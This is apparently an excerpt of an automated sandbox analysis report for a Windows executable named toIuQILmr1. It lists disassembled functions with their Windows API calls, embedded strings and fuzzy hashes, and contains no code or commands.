                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: MessageSend$LongWindow_memset
                                          • String ID:
                                          • API String ID: 830647256-0
                                          • Opcode ID: 59d819537ecbcca75730b93416811ccd37fe8f72093a732cb15af42a2fb404ee
                                          • Instruction ID: 5b4ab318b086ce7fee4a5190f608984885fdabb1181b10d1eeb56addc642a466
                                          • Opcode Fuzzy Hash: 59d819537ecbcca75730b93416811ccd37fe8f72093a732cb15af42a2fb404ee
                                          • Instruction Fuzzy Hash: 39617A71900208AFDB20DFA4CC81EEE77F8AB09714F14455AFE54A72A1C770AE59DBA0
                                          APIs
                                          • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00E27135
                                          • SafeArrayAllocData.OLEAUT32(?), ref: 00E2718E
                                          • VariantInit.OLEAUT32(?), ref: 00E271A0
                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 00E271C0
                                          • VariantCopy.OLEAUT32(?,?), ref: 00E27213
                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 00E27227
                                          • VariantClear.OLEAUT32(?), ref: 00E2723C
                                          • SafeArrayDestroyData.OLEAUT32(?), ref: 00E27249
                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E27252
                                          • VariantClear.OLEAUT32(?), ref: 00E27264
                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E2726F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                          • String ID:
                                          • API String ID: 2706829360-0
                                          • Opcode ID: c0394e94cb695e68c7026422ab1feee14107a52e2f12007a6417149011a2b2c2
                                          • Instruction ID: 7d5ec3af100c8a66ce172670ca77e78a0462649b486adc50d972264fc5e6e09e
                                          • Opcode Fuzzy Hash: c0394e94cb695e68c7026422ab1feee14107a52e2f12007a6417149011a2b2c2
                                          • Instruction Fuzzy Hash: C2415E75A04229EFCF04EF65D844DAEBBB8FF08355F009469F955B7261CB30A949CBA0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Variant$ClearInit$_memset
                                          • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$_NewEnum$get__NewEnum
                                          • API String ID: 2862541840-1765764032
                                          • Opcode ID: 920aba4c0e87c6f1c9990f81af58f034d28dbef3e94ff1709615866eba5bc65d
                                          • Instruction ID: 2838bff7bbc4e7216e7251e79ca83912f8070cda939e1c7a5b3020afe400d1f1
                                          • Opcode Fuzzy Hash: 920aba4c0e87c6f1c9990f81af58f034d28dbef3e94ff1709615866eba5bc65d
                                          • Instruction Fuzzy Hash: 4E91AD71A00219AFDF24DFA5E844FAFBBB8EF85314F109159F519BB281D7709905CBA0
                                          APIs
                                          • WSAStartup.WS2_32(00000101,?), ref: 00E45AA6
                                          • inet_addr.WS2_32(?), ref: 00E45AEB
                                          • gethostbyname.WS2_32(?), ref: 00E45AF7
                                          • IcmpCreateFile.IPHLPAPI ref: 00E45B05
                                          • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00E45B75
                                          • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00E45B8B
                                          • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00E45C00
                                          • WSACleanup.WS2_32 ref: 00E45C06
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                          • String ID: Ping
                                          • API String ID: 1028309954-2246546115
                                          • Opcode ID: 191cea79a81da25241c326e478514e623b2efee945a17658e5c787d1336c0e1d
                                          • Instruction ID: 2be9837fab2d5deac0e0cf1dd5c22cffa2eb739e1f52b317cd884116fbbf9bcd
                                          • Opcode Fuzzy Hash: 191cea79a81da25241c326e478514e623b2efee945a17658e5c787d1336c0e1d
                                          • Instruction Fuzzy Hash: 3F5190326047009FD711AF25EC45B6ABBE4EF48714F14992AF555EB2A2DB70EC04CF61
                                          Strings
                                          • argument not compiled in 16 bit mode, xrefs: 00E21150
                                          • argument is not a compiled regular expression, xrefs: 00E21160
                                          • internal error: opcode not recognized, xrefs: 00DE647D
                                          • failed to get memory, xrefs: 00DE6488
                                          • ERCP, xrefs: 00DE6313
                                          • internal error: missing capturing bracket, xrefs: 00E21158
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: _memset$_memmove
                                          • String ID: ERCP$argument is not a compiled regular expression$argument not compiled in 16 bit mode$failed to get memory$internal error: missing capturing bracket$internal error: opcode not recognized
                                          • API String ID: 2532777613-264027815
                                          • Opcode ID: 86ae316a3def4513b5a2651ad744cedc0c69f9cfdd0033f7ec72188ca028251f
                                          • Instruction ID: aa4f9046539cfecaf3ef37b95744aca68d7e92bbc86031f7921b42c00e9015a9
                                          • Opcode Fuzzy Hash: 86ae316a3def4513b5a2651ad744cedc0c69f9cfdd0033f7ec72188ca028251f
                                          • Instruction Fuzzy Hash: 3D5102719003499BCB24DF66C8817AABBF4EF14354F24856EE94AD7281E731E680CB60
                                          APIs
                                          • SetErrorMode.KERNEL32(00000001), ref: 00E3B73B
                                          • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00E3B7B1
                                          • GetLastError.KERNEL32 ref: 00E3B7BB
                                          • SetErrorMode.KERNEL32(00000000,READY), ref: 00E3B828
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Error$Mode$DiskFreeLastSpace
                                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                          • API String ID: 4194297153-14809454
                                          • Opcode ID: 004af9325c4e9cf3795520c1937903539eb1dd4c1b759bde2989ca5dfa956402
                                          • Instruction ID: ca4511472645a10aa58ed737806d88d40ab5b8ccfaa84a0ef3c6158d537c8654
                                          • Opcode Fuzzy Hash: 004af9325c4e9cf3795520c1937903539eb1dd4c1b759bde2989ca5dfa956402
                                          • Instruction Fuzzy Hash: EA319235A00205AFDB04EF64C889AEEBBB4EF84704F14516BF606F7291DB719946CB61
                                          APIs
                                            • Part of subcall function 00DD7F41: _memmove.LIBCMT ref: 00DD7F82
                                            • Part of subcall function 00E2B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00E2B0E7
                                          • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00E294F6
                                          • GetDlgCtrlID.USER32 ref: 00E29501
                                          • GetParent.USER32 ref: 00E2951D
                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00E29520
                                          • GetDlgCtrlID.USER32(?), ref: 00E29529
                                          • GetParent.USER32(?), ref: 00E29545
                                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 00E29548
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: MessageSend$CtrlParent$ClassName_memmove
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 1536045017-1403004172
                                          • Opcode ID: d25d97266d3c5ae0acd503fa02efb109b406ff64a4d0120b14ae1df3490b6679
                                          • Instruction ID: 2380297f7ff42a6e44990ebe227b88994badf21a22b503375957b5535bae7413
                                          • Opcode Fuzzy Hash: d25d97266d3c5ae0acd503fa02efb109b406ff64a4d0120b14ae1df3490b6679
                                          • Instruction Fuzzy Hash: 4421B270A00214BFCF05AB65DC85EFEBBA8EF45300F101156F561A72A2DB7559199B70
                                          APIs
                                            • Part of subcall function 00DD7F41: _memmove.LIBCMT ref: 00DD7F82
                                            • Part of subcall function 00E2B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00E2B0E7
                                          • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00E295DF
                                          • GetDlgCtrlID.USER32 ref: 00E295EA
                                          • GetParent.USER32 ref: 00E29606
                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00E29609
                                          • GetDlgCtrlID.USER32(?), ref: 00E29612
                                          • GetParent.USER32(?), ref: 00E2962E
                                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 00E29631
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: MessageSend$CtrlParent$ClassName_memmove
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 1536045017-1403004172
                                          • Opcode ID: 48ad94c6ecccf56d3a2664b122b7e37562ae85886cfa48036f32150a8a6aaf8b
                                          • Instruction ID: 08ecbced538015b549a63b09cbcdb24036ab62007db78e205e03ba0bb2940303
                                          • Opcode Fuzzy Hash: 48ad94c6ecccf56d3a2664b122b7e37562ae85886cfa48036f32150a8a6aaf8b
                                          • Instruction Fuzzy Hash: 8A21C274A00214BFDF05AB61DC85EFEBBB8EF48300F141056F921A72A2DB759919DB70
                                          APIs
                                          • GetParent.USER32 ref: 00E29651
                                          • GetClassNameW.USER32(00000000,?,00000100), ref: 00E29666
                                          • _wcscmp.LIBCMT ref: 00E29678
                                          • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00E296F3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: ClassMessageNameParentSend_wcscmp
                                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                          • API String ID: 1704125052-3381328864
                                          • Opcode ID: cdaee78285b91605c1e8273c02b6b09259100195f7ae06ae766a45f5a0b0bed5
                                          • Instruction ID: fedb1aad9bba8bf77b78e88a663508bb6862f6545b2e9702b990082dc5f1923d
                                          • Opcode Fuzzy Hash: cdaee78285b91605c1e8273c02b6b09259100195f7ae06ae766a45f5a0b0bed5
                                          • Instruction Fuzzy Hash: 6A11E77664832BBAEA052621EC06DB677DCCB04364F212026FA09B50D3FE9159504678
                                          APIs
                                          • VariantInit.OLEAUT32(?), ref: 00E48BEC
                                          • CoInitialize.OLE32(00000000), ref: 00E48C19
                                          • CoUninitialize.COMBASE ref: 00E48C23
                                          • GetRunningObjectTable.OLE32(00000000,?), ref: 00E48D23
                                          • SetErrorMode.KERNEL32(00000001,00000029), ref: 00E48E50
                                          • CoGetInstanceFromFile.COMBASE(00000000,?,00000000,00000015,00000002,?,00000001,00E62C0C), ref: 00E48E84
                                          • CoGetObject.OLE32(?,00000000,00E62C0C,?), ref: 00E48EA7
                                          • SetErrorMode.KERNEL32(00000000), ref: 00E48EBA
                                          • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00E48F3A
                                          • VariantClear.OLEAUT32(?), ref: 00E48F4A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                          • String ID:
                                          • API String ID: 2395222682-0
                                          • Opcode ID: 7d1c6c1f9c48ca20e85e5e887f18f8b6099436a1f84b9eada4f72ceaafb4c8e1
                                          • Instruction ID: 1e957aadee54314ff00339e874a99f4709c7535fc7037149712366c9cdeb4add
                                          • Opcode Fuzzy Hash: 7d1c6c1f9c48ca20e85e5e887f18f8b6099436a1f84b9eada4f72ceaafb4c8e1
                                          • Instruction Fuzzy Hash: BEC13471608305AFC704EF64D98492BB7E9FF88748F00596DF58AAB251DB31ED09CB62
                                          APIs
                                          • __swprintf.LIBCMT ref: 00E3419D
                                          • __swprintf.LIBCMT ref: 00E341AA
                                            • Part of subcall function 00DF38D8: __woutput_l.LIBCMT ref: 00DF3931
                                          • FindResourceW.KERNEL32(?,?,0000000E), ref: 00E341D4
                                          • LoadResource.KERNEL32(?,00000000), ref: 00E341E0
                                          • LockResource.KERNEL32(00000000), ref: 00E341ED
                                          • FindResourceW.KERNEL32(?,?,00000003), ref: 00E3420D
                                          • LoadResource.KERNEL32(?,00000000), ref: 00E3421F
                                          • SizeofResource.KERNEL32(?,00000000), ref: 00E3422E
                                          • LockResource.KERNEL32(?), ref: 00E3423A
                                          • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00E3429B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                          • String ID:
                                          • API String ID: 1433390588-0
                                          • Opcode ID: 599c2aadf580512109007a0757db65a753a3f55859eee57e7e459f9ca48abaa1
                                          • Instruction ID: 53a0f3743fdd61741ecebf0197c869105acc258d9288efcb93dbcd8475d9338d
                                          • Opcode Fuzzy Hash: 599c2aadf580512109007a0757db65a753a3f55859eee57e7e459f9ca48abaa1
                                          • Instruction Fuzzy Hash: 47319EF560521AAFDB059FA1DC48EBB7BA8EB04301F014926F905F21A0DB34EA55CBB0
                                          APIs
                                          • GetCurrentThreadId.KERNEL32 ref: 00E31700
                                          • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00E30778,?,00000001), ref: 00E31714
                                          • GetWindowThreadProcessId.USER32(00000000), ref: 00E3171B
                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00E30778,?,00000001), ref: 00E3172A
                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00E3173C
                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00E30778,?,00000001), ref: 00E31755
                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00E30778,?,00000001), ref: 00E31767
                                          • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00E30778,?,00000001), ref: 00E317AC
                                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00E30778,?,00000001), ref: 00E317C1
                                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00E30778,?,00000001), ref: 00E317CC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                          • String ID:
                                          • API String ID: 2156557900-0
                                          APIs
                                          • EnumChildWindows.USER32(?,00E2AA64), ref: 00E2A9A2
                                          Strings
                                          Similarity
                                          • API ID: ChildEnumWindows
                                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                          • API String ID: 3555792229-1603158881
                                          APIs
                                          • SetWindowLongW.USER32(?,000000EB), ref: 00DD2EAE
                                            • Part of subcall function 00DD1DB3: GetClientRect.USER32(?,?), ref: 00DD1DDC
                                            • Part of subcall function 00DD1DB3: GetWindowRect.USER32(?,?), ref: 00DD1E1D
                                            • Part of subcall function 00DD1DB3: ScreenToClient.USER32(?,?), ref: 00DD1E45
                                          • GetDC.USER32 ref: 00E0CF82
                                          • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00E0CF95
                                          • SelectObject.GDI32(00000000,00000000), ref: 00E0CFA3
                                          • SelectObject.GDI32(00000000,00000000), ref: 00E0CFB8
                                          • ReleaseDC.USER32(?,00000000), ref: 00E0CFC0
                                          • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00E0D04B
                                          Strings
                                          Similarity
                                          • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                          • String ID: U
                                          • API String ID: 4009187628-3372436214
                                          APIs
                                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00E57093
                                          • SendMessageW.USER32(?,00001036,00000000,?), ref: 00E570A7
                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00E570C1
                                          • _wcscat.LIBCMT ref: 00E5711C
                                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 00E57133
                                          • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00E57161
                                          Strings
                                          Similarity
                                          • API ID: MessageSend$Window_wcscat
                                          • String ID: -----$SysListView32
                                          • API String ID: 307300125-3975388722
                                          APIs
                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00E5F910), ref: 00E4903D
                                          • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00E5F910), ref: 00E49071
                                          • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00E491EB
                                          • SysFreeString.OLEAUT32(?), ref: 00E49215
                                          Similarity
                                          • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                          • String ID:
                                          • API String ID: 560350794-0
                                          APIs
                                          • _memset.LIBCMT ref: 00E4F9C9
                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00E4FB5C
                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00E4FB80
                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00E4FBC0
                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00E4FBE2
                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00E4FD5E
                                          • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00E4FD90
                                          • CloseHandle.KERNEL32(?), ref: 00E4FDBF
                                          • CloseHandle.KERNEL32(?), ref: 00E4FE36
                                          Similarity
                                          • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                          • String ID:
                                          • API String ID: 4090791747-0
                                          APIs
                                            • Part of subcall function 00DD1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00DD2036,?,00000000,?,?,?,?,00DD16CB,00000000,?), ref: 00DD1B9A
                                          • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00DD20D3
                                          • KillTimer.USER32(-00000001,?,?,?,?,00DD16CB,00000000,?,?,00DD1AE2,?,?), ref: 00DD216E
                                          • DestroyAcceleratorTable.USER32(00000000), ref: 00E0BEF6
                                          • DeleteObject.GDI32(00000000), ref: 00E0BF6C
                                          Similarity
                                          • API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                          • String ID:
                                          • API String ID: 2402799130-0
                                          APIs
                                            • Part of subcall function 00E348AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00E338D3,?), ref: 00E348C7
                                            • Part of subcall function 00E348AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00E338D3,?), ref: 00E348E0
                                            • Part of subcall function 00E34CD3: GetFileAttributesW.KERNEL32(?,00E33947), ref: 00E34CD4
                                          • lstrcmpiW.KERNEL32(?,?), ref: 00E34FE2
                                          • _wcscmp.LIBCMT ref: 00E34FFC
                                          • MoveFileW.KERNEL32(?,?), ref: 00E35017
                                          Similarity
                                          • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                          • String ID:
                                          • API String ID: 793581249-0
                                          APIs
                                          • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00E5896E
                                          Similarity
                                          • API ID: InvalidateRect
                                          • String ID:
                                          • API String ID: 634782764-0
                                          APIs
